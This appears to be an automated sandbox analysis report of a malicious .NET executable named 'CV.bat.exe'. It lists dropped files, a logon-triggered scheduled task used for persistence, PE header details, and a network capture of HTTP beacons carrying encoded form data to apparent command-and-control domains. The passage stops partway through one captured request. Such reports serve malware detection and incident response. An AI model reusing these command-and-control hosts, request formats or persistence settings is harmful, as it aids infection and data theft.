C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0l2oodl.mld.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rejx5zel.xcw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\f-0386u9

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1601
Entropy (8bit):	5.154301716876558
Encrypted:	false
SSDEEP:	24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt0xvn:cge4MYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	CFDF9A04CE28DE0C598CFCD42E4B71C6
SHA1:	A444DD49DDE6830DB7B20072440C83F480019DF9
SHA-256:	19DE38BEA689B47C72651920F6339A6A101E39DAFDF2BE3D1DA27673A21FFC0E
SHA-512:	57BEDF221A0571EAA2084881C38252B883C5973CA0B8B4C4AF05E04388FDB4ADC2D561A48459E6E83425A82930627FBE9409907D652B15F6166A5358F1912E5B
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	885760
Entropy (8bit):	6.509383700052679
Encrypted:	false
SSDEEP:	12288:keOizpM7bMXqr4o/Yl6l01g6GhDPCd9+NrSrqLFmWK4HTN:zjFUbM6rP/Y4l0O/R8+NrS
MD5:	40372D67F0DE4526F04FBA7948F7FF02
SHA1:	F1C8F97BD587125F6C48FB5E80BD191BFF253A97
SHA-256:	8BDBC254D871D5F2FFBDC50EA20070910CFA9C1BE2B114AE1077EBC7B6D245D2
SHA-512:	D36A06ED5E462D2020755028648889E2C78BF8749D853235B78CE76FDC0CDA282AD17239635CC9B068CD050AF3D9A7B07412552C91AC1BAF7288C97E9B8FA183
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c..............0..x..........:.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...@v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H........^..(C......h....................................................{...."..}......{...."..}.......0..c........(........}.....(.............o....(.......{....o....t....(......{......;.............s.....o....&..0.............{.....o....& . ...;.....{.......i.o........i....,.....(...+...{.........,...{......oz......{......;.............s.....o....&..8.....o....(......(......{...........,...{.....o~....................8....j..{....o .....{....o!....*..0..)........{..

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.509383700052679
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	CV.bat.exe
File size:	885760
MD5:	40372d67f0de4526f04fba7948f7ff02
SHA1:	f1c8f97bd587125f6c48fb5e80bd191bff253a97
SHA256:	8bdbc254d871d5f2ffbdc50ea20070910cfa9c1be2b114ae1077ebc7b6d245d2
SHA512:	d36a06ed5e462d2020755028648889e2c78bf8749d853235b78ce76fdc0cda282ad17239635cc9b068cd050af3d9a7b07412552c91ac1baf7288c97e9b8fa183
SSDEEP:	12288:keOizpM7bMXqr4o/Yl6l01g6GhDPCd9+NrSrqLFmWK4HTN:zjFUbM6rP/Y4l0O/R8+NrS
TLSH:	9C15D02203E69B0EC1125334CDD3C3B0AFE84EA5E675C2874FDAFD5BB57B1AAA610145
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c..............0..x..........:.... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4d963a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x633A84FE [Mon Oct 3 06:45:18 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd95e8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd7640	0xd7800	False	0.6740739649796984	data	6.517176085689744	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x608	0x800	False	0.33251953125	data	3.440385989209708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xda090	0x378	data
RT_MANIFEST	0xda418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 15:57:12.286087990 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.419805050 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.419914007 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.420093060 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.553647041 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562021971 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562062979 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562361956 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.562771082 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.696178913 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:25.916497946 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.935096979 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.935260057 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.935497999 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.955483913 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.955503941 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.955688000 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:26.943219900 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.015553951 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.034276009 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.034374952 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.034595013 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.053888083 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.053917885 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.054029942 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:29.218669891 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.578464031 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.597194910 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.597315073 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.597460985 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.616245985 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616281033 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616300106 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616317987 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616703987 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616743088 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616791964 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:31.599716902 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.615569115 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.636198044 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.636320114 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.636440039 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693151951 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693193913 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693223000 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693254948 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693272114 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693298101 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693309069 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693330050 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693355083 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693378925 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693391085 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693417072 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693430901 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693453074 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693833113 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714293957 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714351892 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714390993 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714418888 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714466095 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714504957 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714545012 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714561939 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714595079 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714620113 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714658976 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714689016 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714705944 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714802027 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714934111 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.735672951 CEST	80	49706	91.195.240.94	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 15:57:12.124450922 CEST	57840	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:12.276463985 CEST	53	57840	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:17.571151972 CEST	57990	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:17.592390060 CEST	53	57990	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:18.610126972 CEST	52387	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:18.629693031 CEST	53	52387	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:19.663696051 CEST	56924	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:19.688312054 CEST	53	56924	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:20.697057009 CEST	60625	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:20.868271112 CEST	53	60625	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:25.890259981 CEST	49302	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:25.915287971 CEST	53	49302	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 15:57:12.124450922 CEST	192.168.2.3	8.8.8.8	0xc88	Standard query (0)	www.miarizzuto.org	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:17.571151972 CEST	192.168.2.3	8.8.8.8	0x7dfe	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:18.610126972 CEST	192.168.2.3	8.8.8.8	0x3ff5	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:19.663696051 CEST	192.168.2.3	8.8.8.8	0x2c9b	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:20.697057009 CEST	192.168.2.3	8.8.8.8	0x704b	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:25.890259981 CEST	192.168.2.3	8.8.8.8	0xc356	Standard query (0)	www.yaignars.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 15:57:12.276463985 CEST	8.8.8.8	192.168.2.3	0xc88	No error (0)	www.miarizzuto.org		63.141.242.46	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:17.592390060 CEST	8.8.8.8	192.168.2.3	0x7dfe	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:18.629693031 CEST	8.8.8.8	192.168.2.3	0x3ff5	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:19.688312054 CEST	8.8.8.8	192.168.2.3	0x2c9b	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:20.868271112 CEST	8.8.8.8	192.168.2.3	0x704b	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:25.915287971 CEST	8.8.8.8	192.168.2.3	0xc356	No error (0)	www.yaignars.site		91.195.240.94	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.miarizzuto.org

www.yaignars.site

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	63.141.242.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:12.420093060 CEST	114	OUT	GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1 Host: www.miarizzuto.org Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 15:57:12.562021971 CEST	114	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 03 Oct 2022 13:57:12 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=47bcd440-4323-11ed-8f5c-7822bf2cf5b8; path=/; domain=.miarizzuto.org; expires=Sat, 21 Oct 2090 17:11:19 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49703	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:25.935497999 CEST	117	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
Oct 3, 2022 15:57:25.955483913 CEST	117	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:25 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49704	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:28.034595013 CEST	118	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 186 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 36 38 54 37 54 54 62 45 6a 41 32 41 62 32 33 4e 6c 6e 67 68 68 73 62 69 56 66 66 51 64 72 4a 4d 55 68 46 56 41 64 46 5f 64 6c 61 42 6e 76 41 5a 67 75 66 45 53 2d 42 51 70 39 66 6f 74 41 55 67 55 66 32 66 43 56 62 62 76 2d 70 77 30 78 73 55 7a 4e 33 4f 52 47 35 46 69 7a 38 74 65 68 55 51 69 48 66 33 39 44 31 49 67 39 67 58 33 44 74 34 64 54 32 75 4e 